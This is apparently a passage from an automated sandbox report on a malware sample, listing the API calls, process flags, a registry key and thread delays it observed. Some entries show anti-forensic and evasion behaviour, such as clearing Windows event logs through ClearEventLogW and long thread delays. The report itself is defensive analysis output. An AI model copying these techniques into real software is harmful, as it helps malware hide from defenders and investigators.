    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C201B74 SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,SendMessageW,UpdateWindow,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,3_2_6C201B74
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1D7BB2 IsIconic,3_2_6C1D7BB2
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C235610 GetClientRect,IsRectEmpty,IsWindow,IsIconic,BeginDeferWindowPos,GetClientRect,IsRectEmpty,GetWindowRect,GetParent,IsRectEmpty,EqualRect,EndDeferWindowPos,3_2_6C235610
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C25D734 IsWindowVisible,IsWindowVisible,GetWindowRect,IsIconic,CopyRect,MonitorFromPoint,GetMonitorInfoW,CopyRect,CopyRect,SystemParametersInfoW,OffsetRect,GetSystemMetrics,GetSystemMetrics,3_2_6C25D734
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0432B3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,3_2_0432B3C0
    Source: C:\Users\Public\Bilite\Axialis\Update.exeKey value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4Jump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeWindow / User API: threadDelayed 5763Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4294Jump to behavior
